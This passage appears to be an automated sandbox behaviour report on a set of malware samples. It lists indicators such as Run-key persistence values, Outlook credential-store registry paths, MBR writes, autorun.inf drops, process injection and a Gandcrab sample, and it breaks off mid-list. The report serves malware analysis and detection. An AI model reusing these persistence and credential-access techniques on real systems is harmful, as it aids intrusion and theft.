resource yara_rule \Program Files (x86)\172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe upx behavioral1/memory/1776-129-0x0000000000400000-0x000000000048A000-memory.dmp upx behavioral1/memory/1776-305-0x0000000000400000-0x000000000048A000-memory.dmp upx behavioral1/memory/1776-1010-0x0000000000400000-0x000000000048A000-memory.dmp upx behavioral1/memory/1776-1441-0x0000000000400000-0x000000000048A000-memory.dmp upx behavioral1/memory/1776-1581-0x0000000000400000-0x000000000048A000-memory.dmp upx behavioral1/memory/1776-1671-0x0000000000400000-0x000000000048A000-memory.dmp upx -
Uses the VBS compiler for execution 1 TTPs
-
Processes:
resource yara_rule \Program Files (x86)\Darkest Dungeon setub.exe vmprotect -
Accesses Microsoft Outlook accounts 1 TTPs 4 IoCs
Processes:
172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts 172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe Key opened \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts 172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe Key opened \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts 172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe Key opened \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts 172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
Processes:
cbgsujmwws.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook cbgsujmwws.exe Key opened \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook cbgsujmwws.exe Key opened \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook cbgsujmwws.exe -
Adds Run key to start application 2 TTPs 7 IoCs
Processes:
svhost.exeTEST.exe78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exeClient.exeserver.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\619680d438aded33a3114805b64591c9 = "\"C:\\Users\\Admin\\AppData\\Roaming\\svhost.exe\" .." svhost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\DriverrHub\\Microsoft To Do.exe\"" TEST.exe Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\Adobe = "C:\\Program Files (x86)\\78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe" 78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Sub\\WatchDog.exe" Client.exe Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Run\20006afb0ec33f2e48c8c1f17d4d3382 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\server.exe\" .." server.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\20006afb0ec33f2e48c8c1f17d4d3382 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\server.exe\" .." server.exe Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Run\619680d438aded33a3114805b64591c9 = "\"C:\\Users\\Admin\\AppData\\Roaming\\svhost.exe\" .." svhost.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops desktop.ini file(s) 5 IoCs
Processes:
7f1630df6b57af024a3b561bdadc208f.exedescription ioc process File created C:\Users\Admin\AppData\Local\fa1a32e2b7bf99206cb5ee201df5c35f\Admin@CCJBVTGQ_en-US\Grabber\DRIVE-C\Users\Admin\Desktop\desktop.ini 7f1630df6b57af024a3b561bdadc208f.exe File created C:\Users\Admin\AppData\Local\fa1a32e2b7bf99206cb5ee201df5c35f\Admin@CCJBVTGQ_en-US\Grabber\DRIVE-C\Users\Admin\Documents\desktop.ini 7f1630df6b57af024a3b561bdadc208f.exe File opened for modification C:\Users\Admin\AppData\Local\fa1a32e2b7bf99206cb5ee201df5c35f\Admin@CCJBVTGQ_en-US\Grabber\DRIVE-C\Users\Admin\Documents\desktop.ini 7f1630df6b57af024a3b561bdadc208f.exe File created C:\Users\Admin\AppData\Local\fa1a32e2b7bf99206cb5ee201df5c35f\Admin@CCJBVTGQ_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\desktop.ini 7f1630df6b57af024a3b561bdadc208f.exe File created C:\Users\Admin\AppData\Local\fa1a32e2b7bf99206cb5ee201df5c35f\Admin@CCJBVTGQ_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\desktop.ini 7f1630df6b57af024a3b561bdadc208f.exe -
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
wermgr.exemountvol.exedescription ioc process File opened (read-only) \??\J: wermgr.exe File opened (read-only) \??\K: wermgr.exe File opened (read-only) \??\Q: wermgr.exe File opened (read-only) \??\R: wermgr.exe File opened (read-only) \??\U: wermgr.exe File opened (read-only) \??\G: wermgr.exe File opened (read-only) \??\N: wermgr.exe File opened (read-only) \??\S: wermgr.exe File opened (read-only) \??\T: wermgr.exe File opened (read-only) \??\W: wermgr.exe File opened (read-only) \??\X: mountvol.exe File opened (read-only) \??\E: wermgr.exe File opened (read-only) \??\I: wermgr.exe File opened (read-only) \??\M: wermgr.exe File opened (read-only) \??\Y: wermgr.exe File opened (read-only) \??\H: wermgr.exe File opened (read-only) \??\B: wermgr.exe File opened (read-only) \??\L: wermgr.exe File opened (read-only) \??\O: wermgr.exe File opened (read-only) \??\P: wermgr.exe File opened (read-only) \??\V: wermgr.exe File opened (read-only) \??\X: wermgr.exe File opened (read-only) \??\Z: wermgr.exe File opened (read-only) \??\A: wermgr.exe -
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
Processes:
malecus.exedescription ioc process File opened for modification \??\PhysicalDrive0 malecus.exe -
Drops autorun.inf file 1 TTPs 5 IoCs
Malware can abuse Windows Autorun to spread further via attached volumes.
Processes:
server.exedescription ioc process File created C:\autorun.inf server.exe File opened for modification C:\autorun.inf server.exe File created D:\autorun.inf server.exe File created F:\autorun.inf server.exe File opened for modification F:\autorun.inf server.exe -
Drops file in System32 directory 9 IoCs
Processes:
Happy18.exe938b92958ded4d50a357d22eddf141ad.exeBTZ.exedescription ioc process File opened for modification C:\Windows\SysWOW64\wsock32.dll Happy18.exe File opened for modification C:\Windows\SysWOW64\winview.ocx 938b92958ded4d50a357d22eddf141ad.exe File opened for modification C:\Windows\SysWOW64\winview.ocx BTZ.exe File created C:\Windows\SysWOW64\wowmgr.exe BTZ.exe File created C:\Windows\SysWOW64\Ska.exe Happy18.exe File opened for modification C:\Windows\SysWOW64\Ska.exe Happy18.exe File created C:\Windows\SysWOW64\Ska.dll Happy18.exe File created C:\Windows\SysWOW64\wsock32.ska Happy18.exe File created C:\Windows\SysWOW64\winview.ocx 938b92958ded4d50a357d22eddf141ad.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
wermgr.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\\\pidor.bmp" wermgr.exe -
Suspicious use of SetThreadContext 22 IoCs
Processes:
cbgsujmwws.exe78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exesee7.exesee7.exedescription pid process target process PID 2604 set thread context of 572 2604 cbgsujmwws.exe cbgsujmwws.exe PID 1016 set thread context of 3592 1016 78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe 78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe PID 1776 set thread context of 884 1776 172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe 172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe PID 1776 set thread context of 2564 1776 172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe 172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe PID 1776 set thread context of 1224 1776 172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe 172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe PID 1776 set thread context of 3964 1776 172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe 172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe PID 1776 set thread context of 1864 1776 172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe 172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe PID 1776 set thread context of 2248 1776 172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe 172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe PID 1776 set thread context of 2920 1776 172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe 172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe PID 1776 set thread context of 3764 1776 172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe 172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe PID 1776 set thread context of 3796 1776 172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe 172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe PID 1776 set thread context of 3856 1776 172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe 172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe PID 1776 set thread context of 2900 1776 172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe 172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe PID 1776 set thread context of 3116 1776 172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe 172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe PID 1776 set thread context of 2128 1776 172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe 172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe PID 1776 set thread context of 3888 1776 172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe 172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe PID 1776 set thread context of 4024 1776 172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe 172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe PID 1776 set thread context of 3864 1776 172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe 172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe PID 2692 set thread context of 1916 2692 see7.exe see7.exe PID 1776 set thread context of 2768 1776 172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe 172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe PID 1916 set thread context of 1140 1916 see7.exe Explorer.EXE PID 1776 set thread context of 2868 1776 172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe 172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe -
Drops file in Program Files directory 64 IoCs
Processes:
78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exeクラック.exedescription ioc process File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Pushpin.xml 78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGMN086.XML 78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui_2.3.0.v20140404-1657.jar 78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-spi-actions_ja.jar 78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Hardcover.thmx 78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\ink\it-IT\micaut.dll.mui 78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\rtf_alignright.gif 78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\VIEW.JS 78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\OMML2MML.XSL 78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\WORDREP.XML 78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\sk-SK\tipresx.dll.mui 78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe File opened for modification C:\Program Files\Common Files\System\msadc\en-US\msdaprsr.dll.mui 78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe File opened for modification C:\Program Files\DVD Maker\es-ES\OmdProject.dll.mui 78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe File opened for modification C:\Program Files\7-Zip\Lang\mr.txt 78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-masterfs_zh_CN.jar 78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME12.CSS 78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\ECHO\THMBNAIL.PNG 78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR1B.GIF 78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\ERROR.GIF 78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\es-ES\gadget.xml 78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\Stationery\SoftBlue.jpg 78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe File opened for modification C:\Program Files\Windows Media Player\Network Sharing\wmpnss_color32.jpg 78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\ink\de-DE\rtscom.dll.mui 78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.ui_4.0.100.v20140401-0608.jar 78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\MsMpRes.dll.mui 78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME38.CSS 78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe File opened for modification C:\Program Files (x86)\Common Files\System\Ole DB\de-DE\oledb32r.dll.mui 78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Resource.zip 78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64.nl_zh_4.4.0.v20140623020002.jar 78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-favorites.jar 78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe File opened for modification C:\Program Files\Mozilla Firefox\uninstall\uninstall.log 78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DGPUNCT.XML 78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_hail.png 78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe File created C:\Program Files (x86)\34b0a29a97d72d74cbcf11b5b19c2324a9bbd58dd76a5e87976744414ad47219.exe クラック.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_ffffff_256x240.png 78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\it-IT\msinfo32.exe.mui 78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-jmx.xml 78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\system_h.png 78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR8F.GIF 78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DGWEBSBR.XML 78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe File opened for modification C:\Program Files\Google\Chrome\Application\106.0.5249.119\Locales\bg.pak 78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\NavigationRight_SelectionSubpicture.png 78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe File opened for modification C:\Program Files\Windows Mail\it-IT\WinMail.exe.mui 78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\system_h.png 78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\system_m.png 78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\VSTA\8.0\Microsoft.VisualStudio.Tools.Applications.DesignTime.tlb 78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe File opened for modification C:\Program Files\7-Zip\Lang\bg.txt 78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\en-US\join.avi 78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Push\NavigationUp_ButtonGraphic.png 78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\bg_SlateBlue.gif 78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe File opened for modification C:\Program Files (x86)\Windows Photo Viewer\de-DE\ImagingDevices.exe.mui 78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\pop3.jar 78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe File opened for modification C:\Program Files\Microsoft Games\Mahjong\de-DE\Mahjong.exe.mui 78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe File opened for modification C:\Program Files\Microsoft Games\Multiplayer\Spades\es-ES\shvlzm.exe.mui 78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBBA\MSPUB2B.BDR 78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\ja-JP\js\settings.js 78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\es-ES\msinfo32.exe.mui 78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD21512_.GIF 78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\IPML.ICO 78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe File opened for modification C:\Program Files (x86)\Windows Mail\de-DE\WinMail.exe.mui 78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\Stationery\Soft Blue.htm 78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\RTF_BOLD.GIF 78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe File opened for modification C:\Program Files\Windows Media Player\Network Sharing\wmpnss_bw48.bmp 78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_left_pressed.png 78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe -
Drops file in Windows directory 9 IoCs
Processes:
5e710462c65fe899466e4fb7c1e33c9a.exe57ccb6f0bd910fed428761828ae93553.exeClient.exeBTZ.exe938b92958ded4d50a357d22eddf141ad.exedescription ioc process File created C:\Windows\ja-JP\csrss.exe 5e710462c65fe899466e4fb7c1e33c9a.exe File created C:\Windows\ja-JP\886983d96e3d3e 5e710462c65fe899466e4fb7c1e33c9a.exe File created C:\Windows\Globalization\Sorting\LightNeuronX0.exe 57ccb6f0bd910fed428761828ae93553.exe File created C:\Windows\Globalization\Sorting\78b8e276ce7f24 57ccb6f0bd910fed428761828ae93553.exe File created C:\Windows\xdwd.dll Client.exe File created C:\Windows\1.txt BTZ.exe File created C:\Windows\inf\WMIADAP.exe 5e710462c65fe899466e4fb7c1e33c9a.exe File created C:\Windows\inf\75a57c1bdf437c 5e710462c65fe899466e4fb7c1e33c9a.exe File created C:\Windows\1.txt 938b92958ded4d50a357d22eddf141ad.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 58 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
2f1cc715d0e5d4e9142be74287e75887ec207a6bc006c0617eef653fae74647c.exe172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exeクラック.exe78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exeDarkest Dungeon setub.exenet.exe172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exeevil.exe172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exeGandcrab5.0.3.exe172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exeserver.exenet.exe172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe34b0a29a97d72d74cbcf11b5b19c2324a9bbd58dd76a5e87976744414ad47219.exewowmgr.exe172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exeBTZ.exeevil.execbgsujmwws.exedicsord.exenet1.exe78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exewinhlp32.exevbc.exesee7.exe172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exenet1.exe172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe31cd1